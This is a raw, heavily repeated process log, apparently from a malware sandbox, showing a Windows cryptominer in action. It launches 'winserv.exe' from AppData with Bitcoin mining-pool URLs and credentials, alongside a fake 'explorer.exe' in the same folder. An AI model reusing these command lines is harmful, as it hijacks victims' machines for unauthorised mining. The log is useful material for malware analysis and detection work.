C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
